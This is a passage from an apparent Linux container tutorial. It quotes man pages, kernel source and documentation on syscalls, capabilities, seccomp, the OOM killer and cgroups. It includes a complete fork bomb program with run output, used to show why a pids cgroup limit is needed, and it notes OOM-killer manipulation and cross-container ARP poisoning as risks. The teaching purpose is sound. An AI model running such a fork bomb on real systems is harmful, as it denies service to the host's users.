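/* 1 if a forked task inherits the filter, 0 if not, 2 or -1 on error. */
int filter_survives_fork(void)
{
	return run_in_child(install_then_fork);
}

/* Result of installing without setting no_new_privs first: 0 if it
 * was permitted, otherwise the errno the child saw. */
int install_result_without_nnp(void)
{
	return run_in_child(deny_getppid);
}
```

Run as an unprivileged user with no_new_privs unset, `install_result_without_nnp()` should come back as EACCES, which is the check in `seccomp_prepare_filter` above; with CAP_SYS_ADMIN, or when an ancestor already set no_new_privs, it returns 0.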

man 2 _sysctl

NOTES
	Glibc does not provide a  wrapper for this system call; call
	it using  syscall(2).  Or rather...   don't call it:  use of
	this system  call has  long been discouraged,  and it  is so
	unloved that  it is likely  to disappear in a  future kernel
	version.   Since  Linux 2.6.24,  uses  of  this system  call
	result in warnings  in the kernel log.  Remove  it from your
	programs now; use the /proc/sys interface instead.

	This  system  call  is  available only  if  the  kernel  was
	configured with the CONFIG_SYSCTL_SYSCALL option.

init/Kconfig:1420@c8d2bc

config SYSCTL_SYSCALL
	bool "Sysctl syscall support" if EXPERT
	depends on PROC_SYSCTL
	default n
	select SYSCTL
	---help---
	  sys_sysctl uses binary paths that have been found challenging
	  to properly maintain and use.  The interface in /proc/sys
	  using paths with ascii names is now the primary path to this
	  information.

	  Almost nothing using the binary sysctl interface so if you are
	  trying to save some space it is probably safe to disable this,
	  making your kernel marginally smaller.

	  If unsure say N here.

man 2 alloc_hugepages

DESCRIPTION
	The system calls alloc_hugepages() and free_hugepages() were
	introduced  in Linux  2.5.36  and removed  again in  2.5.54.
	They  existed  only  on  i386  and  ia64  (when  built  with
	CONFIG_HUGETLB_PAGE).  In Linux  2.4.20, the syscall numbers
	exist, but the calls fail with the error ENOSYS.

man 2 bdflush

DESCRIPTION
	Note: Since  Linux 2.6, this  system call is  deprecated and
	does nothing.   It is  likely to  disappear altogether  in a
	future  kernel release.   Nowadays,  the  task performed  by
	bdflush() is handled by the kernel pdflush thread.

man 2 create_module

DESCRIPTION
	Note: This  system call  is present  only in  kernels before
	Linux 2.6.

man 2 nfsservctl

NAME
	nfsservctl - syscall interface to kernel nfs daemon

SYNOPSIS
	#include <linux/nfsd/syscall.h>

	long nfsservctl(int cmd, struct nfsctl_arg *argp,
				 union nfsctl_res *resp);

DESCRIPTION
	Note: Since  Linux 3.1, this  system call no  longer exists.
	It  has  been  replaced  by  a set  of  files  in  the  nfsd
	filesystem; see nfsd(7).

man 2 syscalls

	perfctr(2)	2.2	Sparc; removed in 2.6.34

man 2 get_kernel_syms

GET_KERNEL_SYMS(2) -- 2016-10-08 -- Linux -- Linux Programmer's Manual

NAME
	get_kernel_syms  -  retrieve   exported  kernel  and  module
	symbols

SYNOPSIS
	#include <linux/module.h>

	int get_kernel_syms(struct kernel_sym *table);

	Note:  No declaration  of this  system call  is provided  in
	glibc headers; see NOTES.

DESCRIPTION
	Note: This  system call  is present  only in  kernels before
	Linux 2.6.

man 2 setup

SETUP(2) -- 2008-12-03 -- Linux -- Linux Programmer's Manual

NAME
	setup - setup devices and filesystems, mount root filesystem

	[...]

VERSIONS
	Since Linux 2.1.121, no such function exists anymore.

man 2 clock_settime is unfortunately pretty vague:

man 2 clock_settime

    CLOCK_GETRES(2) -- 2016-05-09 -- Linux Programmer's Manual

    NAME
            clock_getres, clock_gettime, clock_settime  - clock and time
            functions

            [...]

    ERRORS

            EFAULT
                    tp points outside the accessible address space.

            EINVAL
                    The clk_id specified is not supported on this system.

            EPERM
                    clock_settime()  does not  have permission  to set  the
                    clock indicated.

but you can see in the source that `CLOCK_REALTIME` is the only clock with `.clock_set` and `.clock_adj` set:

kernel/time/posix-timers.c:282@c8d2bc

    /*
     * Initialize everything, well, just everything in Posix clocks/timers ;)
     */
    static __init int init_posix_timers(void)
    {
            struct k_clock clock_realtime = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_clock_realtime_get,
                    .clock_set      = posix_clock_realtime_set,
                    .clock_adj      = posix_clock_realtime_adj,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };
            struct k_clock clock_monotonic = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_ktime_get_ts,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };
            struct k_clock clock_monotonic_raw = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_get_monotonic_raw,
            };
            struct k_clock clock_realtime_coarse = {
                    .clock_getres   = posix_get_coarse_res,
                    .clock_get      = posix_get_realtime_coarse,
            };
            struct k_clock clock_monotonic_coarse = {
                    .clock_getres   = posix_get_coarse_res,
                    .clock_get      = posix_get_monotonic_coarse,
            };
            struct k_clock clock_tai = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_get_tai,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };
            struct k_clock clock_boottime = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_get_boottime,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };

            posix_timers_register_clock(CLOCK_REALTIME, &clock_realtime);
            posix_timers_register_clock(CLOCK_MONOTONIC, &clock_monotonic);
            posix_timers_register_clock(CLOCK_MONOTONIC_RAW, &clock_monotonic_raw);
            posix_timers_register_clock(CLOCK_REALTIME_COARSE, &clock_realtime_coarse);
            posix_timers_register_clock(CLOCK_MONOTONIC_COARSE, &clock_monotonic_coarse);
            posix_timers_register_clock(CLOCK_BOOTTIME, &clock_boottime);
            posix_timers_register_clock(CLOCK_TAI, &clock_tai);

            posix_timers_cache = kmem_cache_create("posix_timers_cache",
                                            sizeof (struct k_itimer), 0, SLAB_PANIC,
                                            NULL);
            return 0;
    }

and that those methods go through `settimeofday` and `adjtimex`, which are both also gated by `CAP_SYS_TIME`.

kernel/time/posix-timers.c:212@c8d2bc

    /* Set clock_realtime */
    static int posix_clock_realtime_set(const clockid_t which_clock,
                                        const struct timespec *tp)
    {
            return do_sys_settimeofday(tp, NULL);
    }

    static int posix_clock_realtime_adj(const clockid_t which_clock,
                                        struct timex *t)
    {
            return do_adjtimex(t);
    }

security/commoncap.c:106@c8d2bc

    /**
     * cap_settime - Determine whether the current process may set the system clock
     * @ts: The time to set
     * @tz: The timezone to set
     *
     * Determine whether the current process may set the system clock and timezone
     * information, returning 0 if permission granted, -ve if denied.
     */
    int cap_settime(const struct timespec64 *ts, const struct timezone *tz)
    {
            if (!capable(CAP_SYS_TIME))
                    return -EPERM;
            return 0;
    }

kernel/time/ntp.c:657@c8d2bc

    /**
     * ntp_validate_timex - Ensures the timex is ok for use in do_adjtimex
     */
    int ntp_validate_timex(struct timex *txc)
    {
            if (txc->modes & ADJ_ADJTIME) {
                    /* singleshot must not be used with any other mode bits */
                    if (!(txc->modes & ADJ_OFFSET_SINGLESHOT))
                            return -EINVAL;
                    if (!(txc->modes & ADJ_OFFSET_READONLY) &&
                        !capable(CAP_SYS_TIME))
                            return -EPERM;
            } else {
                    /* In order to modify anything, you gotta be super-user! */
                    if (txc->modes && !capable(CAP_SYS_TIME))
                            return -EPERM;
                    /*
                     * if the quartz is off by more than 10% then
                     * something is VERY wrong!
                     */
                    if (txc->modes & ADJ_TICK &&
                        (txc->tick <  900000/USER_HZ ||
                         txc->tick > 1100000/USER_HZ))
                            return -EINVAL;
            }

            /* ... */
    }

man 3 adjtime

    ADJTIME(3) -- 2016-03-15 -- Linux -- Linux Programmer's Manual

    NAME
            adjtime - correct the time to synchronize the system clock

            [...]

    ERRORS

            EINVAL
                    The adjustment in delta is outside the permitted range.

            EPERM
                    The caller does not have sufficient privilege to adjust
                    the time.  Under Linux,  the CAP_SYS_TIME capability is
                    required.

man 2 pciconfig_read

PCICONFIG_READ(2) -- 2016-07-17 -- Linux -- Linux Programmer's Manual

NAME
	pciconfig_read,  pciconfig_write,   pciconfig_iobase  -  pci
	device information handling
	[...]
ERRORS
	[...]
	EPERM
		User does not have  the CAP_SYS_ADMIN capability.  This
		does not apply to pciconfig_iobase().

Too many to list, but see man 2 quotactl.

man 2 ustat

    USTAT(2) -- 2003-08-04 -- Linux -- Linux Programmer's Manual

    NAME
            ustat - get filesystem statistics

    SYNOPSIS
            #include <sys/types.h>
            #include <unistd.h>    /* libc[45] */
            #include <ustat.h>     /* glibc2 */

            int ustat(dev_t dev, struct ustat *ubuf);

    DESCRIPTION
            ustat() returns information about a mounted filesystem.  dev
            is a device number identifying a device containing a mounted
            filesystem.  ubuf  is a  pointer to  a ustat  structure that
            contains the following members:

                daddr_t f_tfree;      /* Total free blocks */
                ino_t   f_tinode;     /* Number of free inodes */
                char    f_fname[6];   /* Filsys name */
                char    f_fpack[6];   /* Filsys pack name */

            The  last   two  fields,   f_fname  and  f_fpack,   are  not
            implemented  and  will  always  be filled  with  null  bytes
            ('\0').

man 2 sysfs

    SYSFS(2) -- 2010-06-27 -- Linux -- Linux Programmer's Manual

    NAME
            sysfs - get filesystem type information

    SYNOPSIS
            int sysfs(int option, const char *fsname);

            int sysfs(int option, unsigned int fs_index, char *buf);

            int sysfs(int option);

    DESCRIPTION
            sysfs()  returns  information  about  the  filesystem  types
            currently present in  the kernel.  The specific  form of the
            sysfs()  call and  the information  returned depends  on the
            option in effect:

            1  Translate the filesystem identifier  string fsname into a
               filesystem type index.

            2  Translate  the  filesystem  type index  fs_index  into  a
               null-terminated   filesystem  identifier   string.   This
               string will be  written to the buffer pointed  to by buf.
               Make sure that buf has enough space to accept the string.

            3  Return  the total  number of  filesystem types  currently
               present in the kernel.

            The  numbering of  the filesystem  type indexes  begins with
            zero.

man 2 uselib

USELIB(2) -- 2016-03-15 -- Linux -- Linux Programmer's Manual

NAME
	uselib - load shared library

	[...]

NOTES
	[...]

	Since Linux  3.15, this system  call is available  only when
	the kernel is configured with the CONFIG_USELIB option.

man 2 sync_file_range2

SYNC_FILE_RANGE(2) -- 2014-08-19 -- Linux -- Linux Programmer's Manual

NAME
	sync_file_range - sync a file segment with disk

	[...]
NOTES

   sync_file_range2()
	Some   architectures  (e.g.,   PowerPC,  ARM)   need  64-bit
	arguments to be aligned in a suitable pair of registers.  On
	such architectures, the  call signature of sync_file_range()
	shown in the SYNOPSIS would force a register to be wasted as
	padding  between   the  fd   and  offset   arguments.   (See
	syscall(2)  for  details.)  Therefore,  these  architectures
	define  a different  system call  that orders  the arguments
	suitably:

	    int sync_file_range2(int fd, unsigned int flags,
						off64_t offset, off64_t nbytes);

	The behavior  of this system  call is otherwise  exactly the
	same as sync_file_range().

man 2 readdir

READDIR(2) -- 2013-06-21 -- Linux -- Linux Programmer's Manual

NAME
	readdir - read directory entry

SYNOPSIS

	int readdir(unsigned int fd, struct old_linux_dirent *dirp,
			  unsigned int count);

	Note: There  is no glibc  wrapper for this system  call; see
	NOTES.

DESCRIPTION
	This is  not the  function you are  interested in.   Look at
	readdir(3)  for the  POSIX conforming  C library  interface.
	This page  documents the bare kernel  system call interface,
	which is superseded by getdents(2).

	readdir()  reads  one  old_linux_dirent structure  from  the
	directory referred  to by  the file  descriptor fd  into the
	buffer pointed to  by dirp.  The argument  count is ignored;
	at most one old_linux_dirent structure is read.

man 2 kexec_file_load

NAME
	kexec_load, kexec_file_load  - load  a new kernel  for later
	execution
	[...]
ERRORS
	[...]
	EPERM
		The caller does not have the CAP_SYS_BOOT capability.

man 2 nice

NICE(2) -- 2016-03-15 -- Linux -- Linux Programmer's Manual

NAME
	nice - change process priority

	[...]
ERRORS

	EPERM
		The calling process attempted  to increase its priority
		by  supplying  a  negative  inc  but  has  insufficient
		privileges.  Under  Linux, the  CAP_SYS_NICE capability
		is   required.   (But   see  the   discussion  of   the
		RLIMIT_NICE resource limit in setrlimit(2).)

man 2 perfmonctl

PERFMONCTL(2) -- 2013-02-13 -- Linux -- Linux Programmer's Manual

NAME
	perfmonctl - interface to IA-64 performance monitoring unit

	[...]

CONFORMING TO
	perfmonctl() is Linux-specific and  is available only on the
	IA-64 architecture.

man 2 syscalls

	ppc_rtas(2)	2.6.2	PowerPC only

man 2 spu_create

SPU_CREATE(2) -- 2015-12-28 -- Linux -- Linux Programmer's Manual

NAME
	spu_create - create a new spu context

SYNOPSIS
	#include <sys/types.h>
	#include <sys/spu.h>

	int spu_create(const char *pathname, int flags, mode_t mode);
	int spu_create(const char *pathname, int flags, mode_t mode,
				int neighbor_fd);

	Note: There  is no glibc  wrapper for this system  call; see
	NOTES.

DESCRIPTION
	The  spu_create() system  call is  used on  PowerPC machines
	that  implement the  Cell Broadband  Engine Architecture  in
	order  to access  Synergistic  Processor  Units (SPUs).   It
	creates a  new logical  context for an  SPU in  pathname and
	returns a file descriptor associated with it.  pathname must
	refer to a  nonexistent directory in the mount  point of the
	SPU filesystem  (spufs).  If  spu_create() is  successful, a
	directory is  created at pathname  and it is  populated with
	the files described in spufs(7).

man 2 spu_run

SPU_RUN(2) -- 2012-08-05 -- Linux -- Linux Programmer's Manual

NAME
	spu_run - execute an SPU context

SYNOPSIS
	#include <sys/spu.h>

	int spu_run(int fd, unsigned int *npc, unsigned int *event);

	Note: There  is no glibc  wrapper for this system  call; see
	NOTES.

DESCRIPTION
	The spu_run() system  call is used on  PowerPC machines that
	implement the Cell Broadband Engine Architecture in order to
	access Synergistic Processor Units  (SPUs).  The fd argument
	is a  file descriptor returned by  spu_create(2) that refers
	to a specific SPU context.   When the context gets scheduled
	to a  physical SPU, it  starts execution at  the instruction
	pointer passed in npc.

man 2 subpage_prot

SUBPAGE_PROT(2) -- 2012-07-13 -- Linux -- Linux Programmer's Manual

NAME
	subpage_prot -  define a  subpage protection for  an address
	range

	[...]

VERSIONS
	This  system call  is provided  on the  PowerPC architecture
	since Linux 2.6.25.  The system call is provided only if the
	kernel is configured  with CONFIG_PPC_64K_PAGES.  No library
	support is provided.

man 2 syscalls

	utrap_install(2)	2.2	Sparc only

man 2 syscalls

	kern_features(2)	3.7	Sparc64

This is pretty vague, so I looked at the source. It’s only mentioned in a Sparc64-specific file:

arch/sparc/kernel/sys_sparc_64.c:648@c8d2bc

asmlinkage long sys_kern_features(void)
{
	return KERN_FEATURE_MIXED_MODE_STACK;
}

man 2 preadv2

DESCRIPTION
	The readv() system  call reads iovcnt buffers  from the file
	associated  with the  file  descriptor fd  into the  buffers
	described by iov ("scatter input").

	The  writev()  system call  writes  iovcnt  buffers of  data
	described  by  iov to  the  file  associated with  the  file
	descriptor fd ("gather output").

	[...]

	The readv() system call works  just like read(2) except that
	multiple buffers are filled.

	The  writev() system  call works  just like  write(2) except
	that multiple buffers are written out.

	[...]

   preadv() and pwritev()
	The  preadv()  system  call combines  the  functionality  of
	readv() and pread(2).  It performs the same task as readv(),
	but adds a fourth argument, offset, which specifies the file
	offset at which the input operation is to be performed.

	The  pwritev() system  call  combines  the functionality  of
	writev()  and  pwrite(2).   It  performs the  same  task  as
	writev(),  but   adds  a  fourth  argument,   offset,  which
	specifies the file  offset at which the  output operation is
	to be performed.

	The file offset  is not changed by these  system calls.  The
	file referred to by fd must be capable of seeking.

   preadv2() and pwritev2()

	These  system calls  are similar  to preadv()  and pwritev()
	calls, but add  a fifth argument, flags,  which modifies the
	behavior on a per-call basis.

	Unlike preadv() and pwritev(), if the offset argument is -1,
	then the current file offset is used and updated.

	The flags argument contains a bitwise  OR of zero or more of
	the following flags:

	RWF_DSYNC (since Linux 4.7)
		Provide a  per-write equivalent of the  O_DSYNC open(2)
		flag.  This flag is meaningful only for pwritev2(), and
		its effect  applies only to  the data range  written by
		the system call.

	RWF_HIPRI (since Linux 4.6)
		High    priority   read/write.     Allows   block-based
		filesystems  to  use  polling   of  the  device,  which
		provides   lower  latency,   but  may   use  additional
		resources.  (Currently, this feature  is usable only on
		a file descriptor opened using the O_DIRECT flag.)

	RWF_SYNC (since Linux 4.7)
		Provide a  per-write equivalent  of the  O_SYNC open(2)
		flag.  This flag is meaningful only for pwritev2(), and
		its effect  applies only to  the data range  written by
		the system call.
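As a rough illustration of the preadv() behaviour quoted above, here is a minimal sketch that scatters one positioned read across two buffers. The helper name scatter_read_demo, the temp-file path and the "hello world" payload are all made up for the example; only preadv() itself comes from the man page.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE /* exposes preadv() on glibc */
#endif
#include <assert.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

/* Hypothetical helper: writes "hello world" to a temp file, then reads
 * "world" back from offset 6 into two buffers with one preadv() call.
 * Returns the byte count from preadv(), or -1 on any failure. */
ssize_t scatter_read_demo(char first[4], char second[4])
{
	assert(first != NULL && second != NULL);
	char path[] = "/tmp/preadv-demo.XXXXXX";
	int fd = mkstemp(path);
	if (fd == -1)
		return -1;
	unlink(path); /* the file disappears once fd is closed */
	if (write(fd, "hello world", 11) != 11) {
		close(fd);
		return -1;
	}
	memset(first, 0, 4);
	memset(second, 0, 4);
	struct iovec iov[2] = {
		{ .iov_base = first,  .iov_len = 3 },
		{ .iov_base = second, .iov_len = 2 },
	};
	/* Buffers are filled in order, starting at file offset 6. */
	ssize_t n = preadv(fd, iov, 2, 6);
	/* preadv() must leave the file offset where write() left it. */
	if (lseek(fd, 0, SEEK_CUR) != 11)
		n = -1;
	close(fd);
	return n;
}
```

Called with two four-byte buffers, this should leave "wor" in the first and "ld" in the second. preadv2() takes the same arguments plus a trailing flags word.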

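This isn't just a denial-of-service problem. If the contained process consumes a lot of memory and has a better (that is, lower) badness score than some critical host-side process, the host-side process will be killed by the kernel's out-of-memory killer.

The badness score favors longer-running processes, among other things:

“Taming the OOM killer” on LWN:

The process to be killed in an out-of-memory situation is selected based on its badness score. The badness score is reflected in /proc/<pid>/oom_score. This value is determined on the basis that the system loses the minimum amount of work done, recovers a large amount of memory, doesn't kill any innocent process eating tons of memory, and kills the minimum number of processes (if possible limited to one). The badness score is computed using the original memory size of the process, its CPU time (utime + stime), the run time (uptime - start time) and its oom_adj value. The more memory the process uses, the higher the score. The longer a process is alive in the system, the smaller the score.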
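To see the score the kernel currently assigns to a process, the oom_score file can simply be read back. The following is a minimal sketch; read_oom_score is a hypothetical helper name, and it assumes /proc is mounted in the usual place.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper: returns the kernel's current badness score for
 * `pid_str` ("self" or a decimal PID), or -1 if it cannot be read. */
long read_oom_score(const char *pid_str)
{
	assert(pid_str != NULL);
	char path[64];
	long score = -1;
	int len = snprintf(path, sizeof(path), "/proc/%s/oom_score", pid_str);
	if (len < 0 || (size_t)len >= sizeof(path))
		return -1;
	FILE *f = fopen(path, "r");
	if (!f)
		return -1;
	if (fscanf(f, "%ld", &score) != 1)
		score = -1;
	fclose(f);
	return score;
}
```

Comparing read_oom_score("self") inside the container with the score of a host-side process gives a rough idea of which one the OOM killer would pick first.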

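I haven't demonstrated it, but I believe this could be manipulated to cause, for example, a screen-locking program to be killed. It's not unheard of for e.g. xscreensaver to leak memory:

“gltext seems to leak memory, eventually causing the OOM-killer to run”:

gltext is consuming large amounts of memory. Frequently getting killed by oom-killer, but eventually causing me to be unable to log into my computer. Disabling GLText from the list of possible screen savers causes the problem to go away.

There's even an open Ubuntu xscreensaver bug asking to make the OOM killer more likely to kill xscreensaver. This seems like the wrong direction to me...

“Xscreensaver does not protect the system against its children”:

The problem is that the screensaver is not a critical part of the system. If it's a resource hog, it should die early. All you have to do is write "10" to /proc/PID/oom_adj and Bob's your uncle. Until then, Xscreensaver is derelict in its duty.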

man 7 cgroup_namespaces

	Cgroup namespaces virtualize the view of a process's cgroups
	(see   cgroups(7))  as   seen  via   /proc/[pid]/cgroup  and
	/proc/[pid]/mountinfo.

	Each  cgroup  namespace  has  its own  set  of  cgroup  root
	directories,  which are  the  base points  for the  relative
	locations displayed  in /proc/[pid]/cgroup.  When  a process
	creates a new cgroup  namespace using clone(2) or unshare(2)
	with  the  CLONE_NEWCGROUP  flag,  it enters  a  new  cgroup
	namespace in  which its  current cgroups  directories become
	the  cgroup root  directories of  the new  namespace.  (This
	applies both for  the cgroups version 1  hierarchies and the
	cgroups version 2 unified hierarchy.)

Documentation/cgroup-v1/memory.txt@c8d2bc

Brief summary of control files.
[...]
 memory.limit_in_bytes		 # set/show limit of memory usage

Documentation/cgroup-v1/memory.txt@c8d2bc

Brief summary of control files.
[...]
 memory.kmem.limit_in_bytes      # set/show hard limit for kernel memory

man 7 cgroups

   Cgroups version 1 controllers
	Each of the  cgroups version 1 controllers is  governed by a
	kernel configuration  option (listed  below).  Additionally,
	the availability of  the cgroups feature is  governed by the
	CONFIG_CGROUPS kernel configuration option.

	cpu (since Linux 2.6.24; CONFIG_CGROUP_SCHED)
		Cgroups  can be  guaranteed  a minimum  number of  "CPU
		shares" when a  system is busy.  This does  not limit a
		cgroup's CPU usage if the CPUs are not busy.

		Further information  can be found in  the kernel source
		file Documentation/scheduler/sched-bwc.txt.

Documentation/cgroup-v1/pids.txt@c8d2bc

						   Process Number Controller
						   =========================

Abstract
--------

The process number controller is used to allow a cgroup hierarchy to stop any
new tasks from being fork()'d or clone()'d after a certain limit is reached.

Since it is trivial to hit the task limit without hitting any kmemcg limits in
place, PIDs are a fundamental resource. As such, PID exhaustion must be
preventable in the scope of a cgroup hierarchy by allowing resource limiting of
the number of tasks in a cgroup.

Usage
-----

In order to use the `pids` controller, set the maximum number of tasks in
pids.max (this is not available in the root cgroup for obvious reasons). The
number of processes currently in the cgroup is given by pids.current.
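Setting the limit described above comes down to writing a number into pids.max. Here is a minimal sketch; set_pids_max is a hypothetical helper, and where the pids hierarchy is mounted (for instance a directory created under /sys/fs/cgroup/pids) is an assumption about the host, not something the kernel document specifies.

```c
#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Hypothetical helper: write `limit` to <cgroup_dir>/pids.max.
 * `cgroup_dir` is assumed to be an existing, non-root cgroup in the
 * pids hierarchy. Returns 0 on success, -1 on failure. */
int set_pids_max(const char *cgroup_dir, unsigned int limit)
{
	assert(cgroup_dir != NULL);
	char path[4096];
	char value[32];
	int len = snprintf(path, sizeof(path), "%s/pids.max", cgroup_dir);
	if (len < 0 || (size_t)len >= sizeof(path))
		return -1;
	/* No O_CREAT: the kernel creates control files with the cgroup. */
	int fd = open(path, O_WRONLY);
	if (fd == -1)
		return -1;
	len = snprintf(value, sizeof(value), "%u", limit);
	ssize_t written = write(fd, value, (size_t)len);
	close(fd);
	return written == (ssize_t)len ? 0 : -1;
}
```

Once the limit is in place, fork() and clone() in that cgroup start failing when pids.current would exceed it.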

For example:

forkbomb.c
/* -*- compile-command: "gcc -Wall -Werror -static forkbomb.c -o forkbomb" -*- */
#include <stdio.h>
#include <unistd.h>
#include <errno.h>

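int main (int argc, char **argv)
{
	switch (fork()) {
	case -1:
		fprintf(stderr, "++ couldn't even fork once: %m\n");
		return 1;
	case 0:
		/* Child: fork forever. Each new process that fork()
		   succeeds in creating re-enters this loop, so the
		   tree keeps growing until fork() starts failing. */
		while (1) {
			switch (fork()) {
			case -1:
				break;
			case 0:
				fprintf(stderr, "++ successful fork.\n");
				break;
			default:
				break;
			}
		}
		break;
	default:
		/* Parent: idle so the container stays alive. */
		while (1) sleep(1);
		break;
	}
	return 0;
}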
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c forkbomb
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.0sOZgF...done.
=> trying a user namespace...writing /proc/2184/uid_map...writing /proc/2184/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
C-c C-c

Documentation/cgroup-v1/blkio-controller.txt@c8d2bc

Details of cgroup files
=======================
Proportional weight policy files
--------------------------------
- blkio.weight
	- Specifies per cgroup weight. This is default weight of the group
	  on all the devices until and unless overridden by per device rule.
	  (See blkio.weight_device).
	  Currently allowed range of weights is from 10 to 1000.

man 7 cgroups

   Creating cgroups and moving processes
	A cgroup filesystem initially contains a single root cgroup,
	'/', which all processes belong to.  A new cgroup is created
	by creating a directory in the cgroup filesystem:

	    mkdir /sys/fs/cgroup/cpu/cg1

	This creates a new empty cgroup.

	A process  may be moved  to this  cgroup by writing  its PID
	into the cgroup's cgroup.procs file:

	    echo $$ > /sys/fs/cgroup/cpu/cg1/cgroup.procs

	Only one PID at a time should be written to this file.

	Writing  the  value 0  to  a  cgroup.procs file  causes  the
	writing process to be moved to the corresponding cgroup.

	When writing a PID into the cgroup.procs, all threads in the
	process are moved into the new cgroup at once.

	Within a hierarchy, a process can be a member of exactly one
	cgroup.   Writing a  process's  PID to  a cgroup.procs  file
	automatically removes  it from  the cgroup  of which  it was
	previously a member.

	The cgroup.procs  file can be read  to obtain a list  of the
	processes that are  members of a cgroup.   The returned list
	of  PIDs is  not  guaranteed  to be  in  order.   Nor is  it
	guaranteed to  be free of  duplicates.  (For example,  a PID
	may be recycled while reading from the list.)

	In cgroups v1 (but not cgroups v2), an individual thread can
	be moved to  another cgroup by writing its  thread ID (i.e.,
	the kernel thread ID returned  by clone(2) and gettid(2)) to
	the tasks file in a cgroup directory.  This file can be read
	to  discover the  set of  threads  that are  members of  the
	cgroup.  This file is not present in cgroup v2 directories.
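Because the list read from cgroup.procs may be unordered and may contain duplicates, a reader usually wants to normalise it. The sketch below is one way to do that; read_cgroup_procs and cmp_pid are hypothetical names, and the caller is assumed to supply a buffer large enough for the cgroup in question.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

/* Orders two pid_t values for qsort(). */
static int cmp_pid(const void *a, const void *b)
{
	pid_t x = *(const pid_t *)a, y = *(const pid_t *)b;
	return (x > y) - (x < y);
}

/* Hypothetical helper: read up to `cap` PIDs from a cgroup.procs-style
 * file at `path`, then sort them and drop duplicates in place.
 * Returns the number of unique PIDs stored in `out`, or -1 on error. */
ssize_t read_cgroup_procs(const char *path, pid_t *out, size_t cap)
{
	assert(path != NULL && out != NULL);
	FILE *f = fopen(path, "r");
	if (!f)
		return -1;
	size_t n = 0;
	long pid;
	while (n < cap && fscanf(f, "%ld", &pid) == 1)
		out[n++] = (pid_t)pid;
	fclose(f);
	qsort(out, n, sizeof(*out), cmp_pid);
	/* Compact the sorted array, keeping the first of each run. */
	size_t unique = 0;
	for (size_t i = 0; i < n; i++)
		if (unique == 0 || out[unique - 1] != out[i])
			out[unique++] = out[i];
	return (ssize_t)unique;
}
```

The result is still only a snapshot: processes can join or leave the cgroup between the read and whatever the caller does next.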

man 2 setrlimit

	The soft limit is the value that the kernel enforces for the
	corresponding resource.   The hard  limit acts as  a ceiling
	for the soft limit: an unprivileged process may set only its
	soft limit  to a value  in the range from  0 up to  the hard
	limit,  and   (irreversibly)  lower   its  hard   limit.   A
	privileged    process   (under    Linux:   one    with   the
	CAP_SYS_RESOURCE capability)  may make arbitrary  changes to
	either limit value.

Documentation/cgroup-v1/cgroups.txt@c8d2bc

1.4 What does notify_on_release do ?
------------------------------------

If the notify_on_release flag is enabled (1) in a cgroup, then
whenever the last task in the cgroup leaves (exits or attaches to
some other cgroup) and the last child cgroup of that cgroup
is removed, then the kernel runs the command specified by the contents
of the "release_agent" file in that hierarchy's root directory,
supplying the pathname (relative to the mount point of the cgroup
file system) of the abandoned cgroup.  This enables automatic
removal of abandoned cgroups.  The default value of
notify_on_release in the root cgroup at system boot is disabled
(0).  The default value of other cgroups at creation is the current
value of their parents' notify_on_release settings. The default value of
a cgroup hierarchy's release_agent path is empty.

Setting up a release agent on a per-container basis is annoying, so we'll avoid it.

“Cross-container ARP poisoning”, an LXC bug report by Jesse Hertz of NCCGroup

Description:

An unprivileged LXC container can conduct an ARP spoofing attack
against another unprivileged LXC container running on the same
host. This allows man-in-the-middle attacks on another container's
traffic.

Recommendation:

Due to the complex nature of this involving the Linux bridge
interface, NCC is not aware of an easy fix. We suggest involving the
kernel networking team to allow for ARP restrictions on virtual bridge
interfaces. Using ebtables to block and control link layer traffic may
also be an effective fix. Documentation should reflect the risks of
not using any future protections or ebtables.

